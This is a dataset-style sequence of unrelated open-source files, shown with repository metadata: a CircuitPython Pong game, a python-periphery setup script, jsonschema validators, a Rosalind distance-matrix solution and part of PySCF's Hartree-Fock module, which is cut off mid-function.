verbose=1)
Xnew = np.zeros(shape=(100))
for i in range(0,Xnew.size):
#for j in range(0,i):
# Xnew[i][j]=1
Xnew[i]=i
y_new = model.predict_proba(Xnew)
#print(y_new[:,1].tolist())
print(y_new[:,0].tolist())
# show the inputs and predicted outputs
for i in range(len(Xnew)):
print("X=%s, Predicted=%s" % (Xnew[i], y_new[i]))
plt.plot(x_dist,y_new,'ro',label='data')
plt.legend()
#plt.show()
| 27.045455
| 133
| 0.596639
|
4a1120d8a406ba0a251720d6504c60fb45bc4126
| 4,154
|
py
|
Python
|
pong/pong-solution.py
|
titimoby/gamebuino-python
|
d24ddae30177122fad5a9aa55ed90fc3571c5eee
|
[
"MIT"
] | null | null | null |
pong/pong-solution.py
|
titimoby/gamebuino-python
|
d24ddae30177122fad5a9aa55ed90fc3571c5eee
|
[
"MIT"
] | null | null | null |
pong/pong-solution.py
|
titimoby/gamebuino-python
|
d24ddae30177122fad5a9aa55ed90fc3571c5eee
|
[
"MIT"
] | null | null | null |
# ----------------------------------------------------------
# Pong
# Gamebuino Academy Workshop
#
# This is a CircuitPython port of the original C++ code
# Maybe not the more pythonic, but as close as possible
# to the original to be able to understand
# Original workshop: https://gamebuino.com/academy/workshop/make-your-very-first-games-with-pong/hello-world
# ----------------------------------------------------------
# Author: TitiMoby
# Date: May 2019
# ----------------------------------------------------------
import gamebuino_meta as gb
from random import randint
# ball attributes
ball_posX = 20
ball_posY = 20
ball_speedX = 1
ball_speedY = 1
ball_size = 3
# paddle1 attributes
paddle1_posX = 10
paddle1_posY = 30
# paddle2 attributes
paddle2_posX = gb.display.width() - 13
paddle2_posY = 30
# Dimensions for both paddles
paddle_height = 10
paddle_width = 3
# For the AI
paddle2_speedY = 0 # Vertical speed of the AI's paddle
# Scores
score1 = 0 # Player 1's score
score2 = 0 # Player 2's score
difficulty = 3 # Level of difficulty. 3 = EASY et 2 = HARD
while True:
gb.waitForUpdate()
gb.display.clear()
# Difficulty switch
if (gb.buttons.pressed(gb.buttons.MENU)):
if (difficulty == 3): # Easy
difficulty = 2 # Change difficulty
else: # Hard
difficulty = 3 # Change difficulty
# Update paddle 1 (player controlled paddle)
if (gb.buttons.repeat(gb.buttons.UP, 0)):
paddle1_posY = paddle1_posY - 1
if (gb.buttons.repeat(gb.buttons.DOWN, 0)):
paddle1_posY = paddle1_posY + 1
# Update paddle2 (AI controlled paddle)
if (ball_posY > paddle2_posY + paddle_height / 2 and randint(0, difficulty) == 1):
paddle2_speedY = 2
elif (ball_posY < paddle2_posY + paddle_height / 2 and randint(0, difficulty) == 1):
paddle2_speedY = -2
paddle2_posY = paddle2_posY + paddle2_speedY # Update paddle2's position
# Update ball
ball_posX = ball_posX + ball_speedX
ball_posY = ball_posY + ball_speedY
# Collisions with walls
if (ball_posY < 0):
ball_speedY = 1
if (ball_posY > gb.display.height() - ball_size):
ball_speedY = -1
# Collision with paddle1
if ( (ball_posX == paddle1_posX + paddle_width) \
and (ball_posY + ball_size >= paddle1_posY) \
and (ball_posY <= paddle1_posY + paddle_height) ):
ball_speedX = 1
# Collision with paddle2
if ( (ball_posX + ball_size == paddle2_posX) \
and (ball_posY + ball_size >= paddle2_posY) \
and (ball_posY <= paddle2_posY + paddle_height) ):
ball_speedX = -1
# Check if the ball exited the screen
if (ball_posX < 0):
# Reset the ball
ball_posX = 20
ball_posY = randint(20, gb.display.height() - 20) # Random position along the Y axis
ball_speedX = 1
if (randint(0, 2) == 1): # 50% of the time, this is true
ball_speedY = 1
else: # Other 50% of the time
ball_speedY = -1
# Increment player 2's score
score2 = score2 + 1
if (ball_posX > gb.display.width()):
# Reset ball
ball_posX = 20
ball_posY = randint(20, gb.display.height() - 20) # Random position along the Y axis
ball_speedX = 1
if (randint(0, 2) == 1): # 50% of the time, this is true
ball_speedY = 1
else: # Other 50% of the time
ball_speedY = -1
# Increment player 1's score
score1 = score1 + 1
# Draw ball
gb.display.fillRect(ball_posX, ball_posY, ball_size, ball_size)
# Draw paddle1
gb.display.fillRect(paddle1_posX, paddle1_posY, paddle_width, paddle_height)
# Draw paddle2
gb.display.fillRect(paddle2_posX, paddle2_posY, paddle_width, paddle_height)
# Draw scores
# gb.display.setCursor(35, 5) # this method is not present in CircuitPython 0.0.5
gb.display.print(35, 5, score1)
# gb.display.setCursor(42, 5) # this method is not present in CircuitPython 0.0.5
gb.display.print(52, 5, score2)
# Draw difficulty
# gb.display.setCursor(33, gb.display.height() - 5) # this method is not present in CircuitPython 0.0.5
if (difficulty == 3):
gb.display.print(33, gb.display.height() - 5, "EASY")
else:
gb.display.print(33, gb.display.height() - 5, "HARD")
| 29.460993
| 108
| 0.649976
|
4a1120f50406f00b0bbdd8318cf555e8aece5ba8
| 1,633
|
py
|
Python
|
setup.py
|
jonasl/python-periphery
|
37d2b6d10fdc0fa7779f94047e82d3bed4e79dac
|
[
"MIT"
] | 58
|
2020-07-23T09:56:16.000Z
|
2022-03-15T23:43:26.000Z
|
setup.py
|
jonasl/python-periphery
|
37d2b6d10fdc0fa7779f94047e82d3bed4e79dac
|
[
"MIT"
] | null | null | null |
setup.py
|
jonasl/python-periphery
|
37d2b6d10fdc0fa7779f94047e82d3bed4e79dac
|
[
"MIT"
] | 16
|
2020-06-09T15:57:39.000Z
|
2022-03-23T05:02:47.000Z
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='python-periphery',
version='2.0.0',
description='A pure Python 2/3 library for peripheral I/O (GPIO, LED, PWM, SPI, I2C, MMIO, Serial) in Linux.',
author='vsergeev',
author_email='v@sergeev.io',
url='https://github.com/vsergeev/python-periphery',
packages=['periphery'],
long_description="""python-periphery is a pure Python library for GPIO, LED, PWM, SPI, I2C, MMIO, and Serial peripheral I/O interface access in userspace Linux. It is useful in embedded Linux environments (including Raspberry Pi, BeagleBone, etc. platforms) for interfacing with external peripherals. python-periphery is compatible with Python 2 and Python 3, is written in pure Python, and is MIT licensed. See https://github.com/vsergeev/python-periphery for more information.""",
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Embedded Systems',
'Topic :: System :: Hardware',
'Topic :: System :: Hardware :: Hardware Drivers',
],
license='MIT',
keywords='gpio spi led pwm i2c mmio serial uart embedded linux beaglebone raspberrypi rpi odroid',
)
| 52.677419
| 486
| 0.68218
|
4a1121aa0d5cbf908d33f7683b5f2c294c110e6b
| 11,600
|
py
|
Python
|
jsonschema/_validators.py
|
vsajip/jsonschema
|
dc9e996c5dc53963c82adf06c27583407ce1e462
|
[
"MIT"
] | 1
|
2017-09-02T00:37:49.000Z
|
2017-09-02T00:37:49.000Z
|
jsonschema/_validators.py
|
vsajip/jsonschema
|
dc9e996c5dc53963c82adf06c27583407ce1e462
|
[
"MIT"
] | null | null | null |
jsonschema/_validators.py
|
vsajip/jsonschema
|
dc9e996c5dc53963c82adf06c27583407ce1e462
|
[
"MIT"
] | null | null | null |
import re
from jsonschema import _utils
from jsonschema.exceptions import FormatError, ValidationError
from jsonschema.compat import iteritems
FLOAT_TOLERANCE = 10 ** -15
def patternProperties(validator, patternProperties, instance, schema):
if not validator.is_type(instance, "object"):
return
for pattern, subschema in iteritems(patternProperties):
for k, v in iteritems(instance):
if re.search(pattern, k):
for error in validator.descend(
v, subschema, path=k, schema_path=pattern
):
yield error
def additionalProperties(validator, aP, instance, schema):
if not validator.is_type(instance, "object"):
return
extras = set(_utils.find_additional_properties(instance, schema))
if validator.is_type(aP, "object"):
for extra in extras:
for error in validator.descend(instance[extra], aP, path=extra):
yield error
elif not aP and extras:
error = "Additional properties are not allowed (%s %s unexpected)"
yield ValidationError(error % _utils.extras_msg(extras))
def items(validator, items, instance, schema):
if not validator.is_type(instance, "array"):
return
if validator.is_type(items, "object"):
for index, item in enumerate(instance):
for error in validator.descend(item, items, path=index):
yield error
else:
for (index, item), subschema in zip(enumerate(instance), items):
for error in validator.descend(
item, subschema, path=index, schema_path=index
):
yield error
def additionalItems(validator, aI, instance, schema):
if (
not validator.is_type(instance, "array") or
validator.is_type(schema.get("items", {}), "object")
):
return
if validator.is_type(aI, "object"):
for index, item in enumerate(instance[len(schema.get("items", [])):]):
for error in validator.descend(item, aI, path=index):
yield error
elif not aI and len(instance) > len(schema.get("items", [])):
error = "Additional items are not allowed (%s %s unexpected)"
yield ValidationError(
error %
_utils.extras_msg(instance[len(schema.get("items", [])):])
)
def minimum(validator, minimum, instance, schema):
if not validator.is_type(instance, "number"):
return
instance = float(instance)
if schema.get("exclusiveMinimum", False):
failed = instance <= minimum
cmp = "less than or equal to"
else:
failed = instance < minimum
cmp = "less than"
if failed:
yield ValidationError(
"%r is %s the minimum of %r" % (instance, cmp, minimum)
)
def maximum(validator, maximum, instance, schema):
if not validator.is_type(instance, "number"):
return
instance = float(instance)
if schema.get("exclusiveMaximum", False):
failed = instance >= maximum
cmp = "greater than or equal to"
else:
failed = instance > maximum
cmp = "greater than"
if failed:
yield ValidationError(
"%r is %s the maximum of %r" % (instance, cmp, maximum)
)
def multipleOf(validator, dB, instance, schema):
if not validator.is_type(instance, "number"):
return
if isinstance(dB, float):
mod = instance % dB
failed = (mod > FLOAT_TOLERANCE) and (dB - mod) > FLOAT_TOLERANCE
else:
failed = instance % dB
if failed:
yield ValidationError("%r is not a multiple of %r" % (instance, dB))
def minItems(validator, mI, instance, schema):
if validator.is_type(instance, "array") and len(instance) < mI:
yield ValidationError("%r is too short" % (instance,))
def maxItems(validator, mI, instance, schema):
if validator.is_type(instance, "array") and len(instance) > mI:
yield ValidationError("%r is too long" % (instance,))
def uniqueItems(validator, uI, instance, schema):
if (
uI and
validator.is_type(instance, "array") and
not _utils.uniq(instance)
):
yield ValidationError("%r has non-unique elements" % instance)
def pattern(validator, patrn, instance, schema):
if (
validator.is_type(instance, "string") and
not re.search(patrn, instance)
):
yield ValidationError("%r does not match %r" % (instance, patrn))
def format(validator, format, instance, schema):
if (
validator.format_checker is not None and
validator.is_type(instance, "string")
):
try:
validator.format_checker.check(instance, format)
except FormatError as error:
yield ValidationError(error.message, cause=error.cause)
def minLength(validator, mL, instance, schema):
if validator.is_type(instance, "string") and len(instance) < mL:
yield ValidationError("%r is too short" % (instance,))
def maxLength(validator, mL, instance, schema):
if validator.is_type(instance, "string") and len(instance) > mL:
yield ValidationError("%r is too long" % (instance,))
def dependencies(validator, dependencies, instance, schema):
if not validator.is_type(instance, "object"):
return
for property, dependency in iteritems(dependencies):
if property not in instance:
continue
if validator.is_type(dependency, "object"):
for error in validator.descend(
instance, dependency, schema_path=property
):
yield error
else:
dependencies = _utils.ensure_list(dependency)
for dependency in dependencies:
if dependency not in instance:
yield ValidationError(
"%r is a dependency of %r" % (dependency, property)
)
def enum(validator, enums, instance, schema):
if instance not in enums:
yield ValidationError("%r is not one of %r" % (instance, enums))
def ref(validator, ref, instance, schema):
with validator.resolver.resolving(ref) as resolved:
for error in validator.descend(instance, resolved):
yield error
def type_draft3(validator, types, instance, schema):
types = _utils.ensure_list(types)
all_errors = []
for index, type in enumerate(types):
if type == "any":
return
if validator.is_type(type, "object"):
errors = list(validator.descend(instance, type, schema_path=index))
if not errors:
return
all_errors.extend(errors)
elif validator.is_type(type, "string"):
if validator.is_type(instance, type):
return
else:
yield ValidationError(
_utils.types_msg(instance, types), context=all_errors,
)
def properties_draft3(validator, properties, instance, schema):
if not validator.is_type(instance, "object"):
return
for property, subschema in iteritems(properties):
if property in instance:
for error in validator.descend(
instance[property],
subschema,
path=property,
schema_path=property,
):
yield error
elif subschema.get("required", False):
error = ValidationError("%r is a required property" % property)
error._set(
validator="required",
validator_value=subschema["required"],
instance=instance,
schema=schema,
)
error.path.appendleft(property)
error.schema_path.extend([property, "required"])
yield error
def disallow_draft3(validator, disallow, instance, schema):
for disallowed in _utils.ensure_list(disallow):
if validator.is_valid(instance, {"type" : [disallowed]}):
yield ValidationError(
"%r is disallowed for %r" % (disallowed, instance)
)
def extends_draft3(validator, extends, instance, schema):
if validator.is_type(extends, "object"):
for error in validator.descend(instance, extends):
yield error
return
for index, subschema in enumerate(extends):
for error in validator.descend(instance, subschema, schema_path=index):
yield error
def type_draft4(validator, types, instance, schema):
types = _utils.ensure_list(types)
if not any(validator.is_type(instance, type) for type in types):
yield ValidationError(_utils.types_msg(instance, types))
def properties_draft4(validator, properties, instance, schema):
if not validator.is_type(instance, "object"):
return
for property, subschema in iteritems(properties):
if property in instance:
for error in validator.descend(
instance[property],
subschema,
path=property,
schema_path=property,
):
yield error
def required_draft4(validator, required, instance, schema):
if not validator.is_type(instance, "object"):
return
for property in required:
if property not in instance:
yield ValidationError("%r is a required property" % property)
def minProperties_draft4(validator, mP, instance, schema):
if validator.is_type(instance, "object") and len(instance) < mP:
yield ValidationError(
"%r does not have enough properties" % (instance,)
)
def maxProperties_draft4(validator, mP, instance, schema):
if not validator.is_type(instance, "object"):
return
if validator.is_type(instance, "object") and len(instance) > mP:
yield ValidationError("%r has too many properties" % (instance,))
def allOf_draft4(validator, allOf, instance, schema):
for index, subschema in enumerate(allOf):
for error in validator.descend(instance, subschema, schema_path=index):
yield error
def oneOf_draft4(validator, oneOf, instance, schema):
subschemas = enumerate(oneOf)
all_errors = []
for index, subschema in subschemas:
errs = list(validator.descend(instance, subschema, schema_path=index))
if not errs:
first_valid = subschema
break
all_errors.extend(errs)
else:
yield ValidationError(
"%r is not valid under any of the given schemas" % (instance,),
context=all_errors,
)
more_valid = [s for i, s in subschemas if validator.is_valid(instance, s)]
if more_valid:
more_valid.append(first_valid)
reprs = ", ".join(repr(schema) for schema in more_valid)
yield ValidationError(
"%r is valid under each of %s" % (instance, reprs)
)
def anyOf_draft4(validator, anyOf, instance, schema):
all_errors = []
for index, subschema in enumerate(anyOf):
errs = list(validator.descend(instance, subschema, schema_path=index))
if not errs:
break
all_errors.extend(errs)
else:
yield ValidationError(
"%r is not valid under any of the given schemas" % (instance,),
context=all_errors,
)
def not_draft4(validator, not_schema, instance, schema):
if validator.is_valid(instance, not_schema):
yield ValidationError(
"%r is not allowed for %r" % (not_schema, instance)
)
| 31.955923
| 79
| 0.618448
|
4a11229346e75e67a5eeebca050f01f5a9492af3
| 120
|
py
|
Python
|
maskrcnn_benchmark/modeling/backbone/__init__.py
|
chenzhutian/auto-infog-timeline
|
0e524d5045aa0c925bbf1d8803782169735a4597
|
[
"MIT"
] | 10
|
2019-10-01T08:33:41.000Z
|
2021-09-03T18:09:51.000Z
|
maskrcnn_benchmark/modeling/backbone/__init__.py
|
PaParaZz1/auto-infog-timeline
|
9f7dd5ef939a6955c69b7ce329b3b87fff89f6f5
|
[
"MIT"
] | 1
|
2019-12-30T13:05:24.000Z
|
2019-12-30T13:05:24.000Z
|
maskrcnn_benchmark/modeling/backbone/__init__.py
|
PaParaZz1/auto-timeline-v2
|
b01e6efdaeb2f63da449844ec818d21ed305c4cf
|
[
"MIT"
] | 2
|
2020-12-21T18:42:08.000Z
|
2021-11-30T15:24:27.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
from .backbone import build_backbone, ResNetXFPN
| 60
| 71
| 0.8
|
4a1123f9ad50199edc79850f3b0679bbc5120676
| 1,353
|
py
|
Python
|
scripts/pdst.py
|
akikuno/rosalind
|
7015dc63e493d870e5789e99f2ee523a9b1f5ab9
|
[
"MIT"
] | null | null | null |
scripts/pdst.py
|
akikuno/rosalind
|
7015dc63e493d870e5789e99f2ee523a9b1f5ab9
|
[
"MIT"
] | null | null | null |
scripts/pdst.py
|
akikuno/rosalind
|
7015dc63e493d870e5789e99f2ee523a9b1f5ab9
|
[
"MIT"
] | null | null | null |
# https://rosalind.info/problems/pdst/
def fmtfa(fasta: list):
prev = True
header = []
seq = []
for f in fasta:
if ">" in f:
header.append(f[1:])
prev = True
elif prev:
seq.append(f)
prev = False
else:
seq[-1] += f
return header, seq
# INPUT -------------------------------------------
file_in = "sample/dataset/pdst.txt"
file_out = "sample/output/pdst.txt"
with open(file_in) as f:
data = f.read().splitlines()
with open(file_out) as f:
outcome = f.read().splitlines()
file_in = "case/dataset/pdst.txt"
with open(file_in) as f:
data_case = f.read().splitlines()
if not data_case == []:
data = data_case
# MAIN -------------------------------------------
_, seq = fmtfa(data)
def dist(seq1, seq2):
n = len(seq1)
d = 0
for i in range(n):
if seq1[i] != seq2[i]:
d += 1
return d / n
n = len(seq)
ans = []
for i in range(n):
for j in range(n):
seq1 = seq[i]
seq2 = seq[j]
d = dist(seq1, seq2)
ans.append(d)
tmp = []
for i in range(0, len(ans), n):
tmp.append(" ".join([str(a) for a in ans[i:i+n]]))
ans = "\n".join(tmp)
# OUTPUT -------------------------------------------
with open("case/output/pdst.txt", "w") as f:
f.write(ans)
# END
| 18.534247
| 54
| 0.473762
|
4a112449855f2c8ae46fee4ce7db3c53cbf2a071
| 73,168
|
py
|
Python
|
pyscf/scf/hf.py
|
tepl/pyscf
|
503dcae94ca19d37f0146fa988ec77cf60954def
|
[
"Apache-2.0"
] | null | null | null |
pyscf/scf/hf.py
|
tepl/pyscf
|
503dcae94ca19d37f0146fa988ec77cf60954def
|
[
"Apache-2.0"
] | null | null | null |
pyscf/scf/hf.py
|
tepl/pyscf
|
503dcae94ca19d37f0146fa988ec77cf60954def
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Hartree-Fock
'''
import sys
import tempfile
import time
from functools import reduce
import numpy
import scipy.linalg
import h5py
from pyscf import gto
from pyscf import lib
from pyscf.lib import logger
from pyscf.scf import diis
from pyscf.scf import _vhf
from pyscf.scf import chkfile
from pyscf.data import nist
from pyscf import __config__
WITH_META_LOWDIN = getattr(__config__, 'scf_analyze_with_meta_lowdin', True)
PRE_ORTH_METHOD = getattr(__config__, 'scf_analyze_pre_orth_method', 'ANO')
MO_BASE = getattr(__config__, 'MO_BASE', 1)
TIGHT_GRAD_CONV_TOL = getattr(__config__, 'scf_hf_kernel_tight_grad_conv_tol', True)
MUTE_CHKFILE = getattr(__config__, 'scf_hf_SCF_mute_chkfile', False)
# For code compatibility in python-2 and python-3
if sys.version_info >= (3,):
unicode = str
def kernel(mf, conv_tol=1e-10, conv_tol_grad=None,
dump_chk=True, dm0=None, callback=None, conv_check=True, **kwargs):
'''kernel: the SCF driver.
Args:
mf : an instance of SCF class
mf object holds all parameters to control SCF. One can modify its
member functions to change the behavior of SCF. The member
functions which are called in kernel are
| mf.get_init_guess
| mf.get_hcore
| mf.get_ovlp
| mf.get_veff
| mf.get_fock
| mf.get_grad
| mf.eig
| mf.get_occ
| mf.make_rdm1
| mf.energy_tot
| mf.dump_chk
Kwargs:
conv_tol : float
converge threshold.
conv_tol_grad : float
gradients converge threshold.
dump_chk : bool
Whether to save SCF intermediate results in the checkpoint file
dm0 : ndarray
Initial guess density matrix. If not given (the default), the kernel
takes the density matrix generated by ``mf.get_init_guess``.
callback : function(envs_dict) => None
callback function takes one dict as the argument which is
generated by the builtin function :func:`locals`, so that the
callback function can access all local variables in the current
envrionment.
Returns:
A list : scf_conv, e_tot, mo_energy, mo_coeff, mo_occ
scf_conv : bool
True means SCF converged
e_tot : float
Hartree-Fock energy of last iteration
mo_energy : 1D float array
Orbital energies. Depending the eig function provided by mf
object, the orbital energies may NOT be sorted.
mo_coeff : 2D array
Orbital coefficients.
mo_occ : 1D array
Orbital occupancies. The occupancies may NOT be sorted from large
to small.
Examples:
>>> from pyscf import gto, scf
>>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1', basis='cc-pvdz')
>>> conv, e, mo_e, mo, mo_occ = scf.hf.kernel(scf.hf.SCF(mol), dm0=numpy.eye(mol.nao_nr()))
>>> print('conv = %s, E(HF) = %.12f' % (conv, e))
conv = True, E(HF) = -1.081170784378
'''
if 'init_dm' in kwargs:
raise RuntimeError('''
You see this error message because of the API updates in pyscf v0.11.
Keyword argument "init_dm" is replaced by "dm0"''')
cput0 = (time.clock(), time.time())
if conv_tol_grad is None:
conv_tol_grad = numpy.sqrt(conv_tol)
logger.info(mf, 'Set gradient conv threshold to %g', conv_tol_grad)
mol = mf.mol
if dm0 is None:
dm = mf.get_init_guess(mol, mf.init_guess)
else:
dm = dm0
h1e = mf.get_hcore(mol)
vhf = mf.get_veff(mol, dm)
e_tot = mf.energy_tot(dm, h1e, vhf)
logger.info(mf, 'init E= %.15g', e_tot)
scf_conv = False
mo_energy = mo_coeff = mo_occ = None
s1e = mf.get_ovlp(mol)
cond = lib.cond(s1e)
logger.debug(mf, 'cond(S) = %s', cond)
if numpy.max(cond)*1e-17 > conv_tol:
logger.warn(mf, 'Singularity detected in overlap matrix (condition number = %4.3g). '
'SCF may be inaccurate and hard to converge.', numpy.max(cond))
# Skip SCF iterations. Compute only the total energy of the initial density
if mf.max_cycle <= 0:
fock = mf.get_fock(h1e, s1e, vhf, dm) # = h1e + vhf, no DIIS
mo_energy, mo_coeff = mf.eig(fock, s1e)
mo_occ = mf.get_occ(mo_energy, mo_coeff)
return scf_conv, e_tot, mo_energy, mo_coeff, mo_occ
if isinstance(mf.diis, lib.diis.DIIS):
mf_diis = mf.diis
elif mf.diis:
assert issubclass(mf.DIIS, lib.diis.DIIS)
mf_diis = mf.DIIS(mf, mf.diis_file)
mf_diis.space = mf.diis_space
mf_diis.rollback = mf.diis_space_rollback
else:
mf_diis = None
if dump_chk and mf.chkfile:
# Explicit overwrite the mol object in chkfile
# Note in pbc.scf, mf.mol == mf.cell, cell is saved under key "mol"
chkfile.save_mol(mol, mf.chkfile)
# A preprocessing hook before the SCF iteration
mf.pre_kernel(locals())
cput1 = logger.timer(mf, 'initialize scf', *cput0)
for cycle in range(mf.max_cycle):
dm_last = dm
last_hf_e = e_tot
fock = mf.get_fock(h1e, s1e, vhf, dm, cycle, mf_diis)
mo_energy, mo_coeff = mf.eig(fock, s1e)
mo_occ = mf.get_occ(mo_energy, mo_coeff)
dm = mf.make_rdm1(mo_coeff, mo_occ)
# attach mo_coeff and mo_occ to dm to improve DFT get_veff efficiency
dm = lib.tag_array(dm, mo_coeff=mo_coeff, mo_occ=mo_occ)
vhf = mf.get_veff(mol, dm, dm_last, vhf)
e_tot = mf.energy_tot(dm, h1e, vhf)
# Here Fock matrix is h1e + vhf, without DIIS. Calling get_fock
# instead of the statement "fock = h1e + vhf" because Fock matrix may
# be modified in some methods.
fock = mf.get_fock(h1e, s1e, vhf, dm) # = h1e + vhf, no DIIS
norm_gorb = numpy.linalg.norm(mf.get_grad(mo_coeff, mo_occ, fock))
if not TIGHT_GRAD_CONV_TOL:
norm_gorb = norm_gorb / numpy.sqrt(norm_gorb.size)
norm_ddm = numpy.linalg.norm(dm-dm_last)
logger.info(mf, 'cycle= %d E= %.15g delta_E= %4.3g |g|= %4.3g |ddm|= %4.3g',
cycle+1, e_tot, e_tot-last_hf_e, norm_gorb, norm_ddm)
if callable(mf.check_convergence):
scf_conv = mf.check_convergence(locals())
elif abs(e_tot-last_hf_e) < conv_tol and norm_gorb < conv_tol_grad:
scf_conv = True
if dump_chk:
mf.dump_chk(locals())
if callable(callback):
callback(locals())
cput1 = logger.timer(mf, 'cycle= %d'%(cycle+1), *cput1)
if scf_conv:
break
if scf_conv and conv_check:
# An extra diagonalization, to remove level shift
#fock = mf.get_fock(h1e, s1e, vhf, dm) # = h1e + vhf
mo_energy, mo_coeff = mf.eig(fock, s1e)
mo_occ = mf.get_occ(mo_energy, mo_coeff)
dm, dm_last = mf.make_rdm1(mo_coeff, mo_occ), dm
dm = lib.tag_array(dm, mo_coeff=mo_coeff, mo_occ=mo_occ)
vhf = mf.get_veff(mol, dm, dm_last, vhf)
e_tot, last_hf_e = mf.energy_tot(dm, h1e, vhf), e_tot
fock = mf.get_fock(h1e, s1e, vhf, dm)
norm_gorb = numpy.linalg.norm(mf.get_grad(mo_coeff, mo_occ, fock))
if not TIGHT_GRAD_CONV_TOL:
norm_gorb = norm_gorb / numpy.sqrt(norm_gorb.size)
norm_ddm = numpy.linalg.norm(dm-dm_last)
conv_tol = conv_tol * 10
conv_tol_grad = conv_tol_grad * 3
if callable(mf.check_convergence):
scf_conv = mf.check_convergence(locals())
elif abs(e_tot-last_hf_e) < conv_tol or norm_gorb < conv_tol_grad:
scf_conv = True
logger.info(mf, 'Extra cycle E= %.15g delta_E= %4.3g |g|= %4.3g |ddm|= %4.3g',
e_tot, e_tot-last_hf_e, norm_gorb, norm_ddm)
if dump_chk:
mf.dump_chk(locals())
logger.timer(mf, 'scf_cycle', *cput0)
# A post-processing hook before return
mf.post_kernel(locals())
return scf_conv, e_tot, mo_energy, mo_coeff, mo_occ
def energy_elec(mf, dm=None, h1e=None, vhf=None):
r'''Electronic part of Hartree-Fock energy, for given core hamiltonian and
HF potential
... math::
E = \sum_{ij}h_{ij} \gamma_{ji}
+ \frac{1}{2}\sum_{ijkl} \gamma_{ji}\gamma_{lk} \langle ik||jl\rangle
Note this function has side effects which cause mf.scf_summary updated.
Args:
mf : an instance of SCF class
Kwargs:
dm : 2D ndarray
one-partical density matrix
h1e : 2D ndarray
Core hamiltonian
vhf : 2D ndarray
HF potential
Returns:
Hartree-Fock electronic energy and the Coulomb energy
Examples:
>>> from pyscf import gto, scf
>>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
>>> mf = scf.RHF(mol)
>>> mf.scf()
>>> dm = mf.make_rdm1()
>>> scf.hf.energy_elec(mf, dm)
(-1.5176090667746334, 0.60917167853723675)
>>> mf.energy_elec(dm)
(-1.5176090667746334, 0.60917167853723675)
'''
if dm is None: dm = mf.make_rdm1()
if h1e is None: h1e = mf.get_hcore()
if vhf is None: vhf = mf.get_veff(mf.mol, dm)
e1 = numpy.einsum('ij,ji->', h1e, dm)
e_coul = numpy.einsum('ij,ji->', vhf, dm) * .5
mf.scf_summary['e1'] = e1.real
mf.scf_summary['e2'] = e_coul.real
logger.debug(mf, 'E1 = %s E_coul = %s', e1, e_coul)
return (e1+e_coul).real, e_coul
def energy_tot(mf, dm=None, h1e=None, vhf=None):
r'''Total Hartree-Fock energy, electronic part plus nuclear repulstion
See :func:`scf.hf.energy_elec` for the electron part
Note this function has side effects which cause mf.scf_summary updated.
'''
nuc = mf.energy_nuc()
e_tot = mf.energy_elec(dm, h1e, vhf)[0] + nuc
mf.scf_summary['nuc'] = nuc.real
return e_tot
def get_hcore(mol):
'''Core Hamiltonian
Examples:
>>> from pyscf import gto, scf
>>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
>>> scf.hf.get_hcore(mol)
array([[-0.93767904, -0.59316327],
[-0.59316327, -0.93767904]])
'''
h = mol.intor_symmetric('int1e_kin')
if mol._pseudo:
# Although mol._pseudo for GTH PP is only available in Cell, GTH PP
# may exist if mol is converted from cell object.
from pyscf.gto import pp_int
h += pp_int.get_gth_pp(mol)
else:
h+= mol.intor_symmetric('int1e_nuc')
if len(mol._ecpbas) > 0:
h += mol.intor_symmetric('ECPscalar')
return h
def get_ovlp(mol):
'''Overlap matrix
'''
return mol.intor_symmetric('int1e_ovlp')
def init_guess_by_minao(mol):
'''Generate initial guess density matrix based on ANO basis, then project
the density matrix to the basis set defined by ``mol``
Returns:
Density matrix, 2D ndarray
Examples:
>>> from pyscf import gto, scf
>>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
>>> scf.hf.init_guess_by_minao(mol)
array([[ 0.94758917, 0.09227308],
[ 0.09227308, 0.94758917]])
'''
from pyscf.scf import atom_hf
from pyscf.scf import addons
def minao_basis(symb, nelec_ecp):
occ = []
basis_ano = []
if gto.is_ghost_atom(symb):
return occ, basis_ano
stdsymb = gto.mole._std_symbol(symb)
basis_add = gto.basis.load('ano', stdsymb)
# coreshl defines the core shells to be removed in the initial guess
coreshl = gto.ecp.core_configuration(nelec_ecp)
#coreshl = (0,0,0,0) # it keeps all core electrons in the initial guess
for l in range(4):
ndocc, frac = atom_hf.frac_occ(stdsymb, l)
assert ndocc >= coreshl[l]
degen = l * 2 + 1
occ_l = [2,]*(ndocc-coreshl[l]) + [frac,]
occ.append(numpy.repeat(occ_l, degen))
basis_ano.append([l] + [b[:1] + b[1+coreshl[l]:ndocc+2]
for b in basis_add[l][1:]])
occ = numpy.hstack(occ)
if nelec_ecp > 0:
if symb in mol._basis:
input_basis = mol._basis[symb]
elif stdsymb in mol._basis:
input_basis = mol._basis[stdsymb]
else:
raise KeyError(symb)
basis4ecp = [[] for i in range(4)]
for bas in input_basis:
l = bas[0]
if l < 4:
basis4ecp[l].append(bas)
occ4ecp = []
for l in range(4):
nbas_l = sum((len(bas[1]) - 1) for bas in basis4ecp[l])
ndocc, frac = atom_hf.frac_occ(stdsymb, l)
ndocc -= coreshl[l]
assert ndocc <= nbas_l
occ_l = numpy.zeros(nbas_l)
occ_l[:ndocc] = 2
if frac > 0:
occ_l[ndocc] = frac
occ4ecp.append(numpy.repeat(occ_l, l * 2 + 1))
occ4ecp = numpy.hstack(occ4ecp)
basis4ecp = lib.flatten(basis4ecp)
# Compared to ANO valence basis, to check whether the ECP basis set has
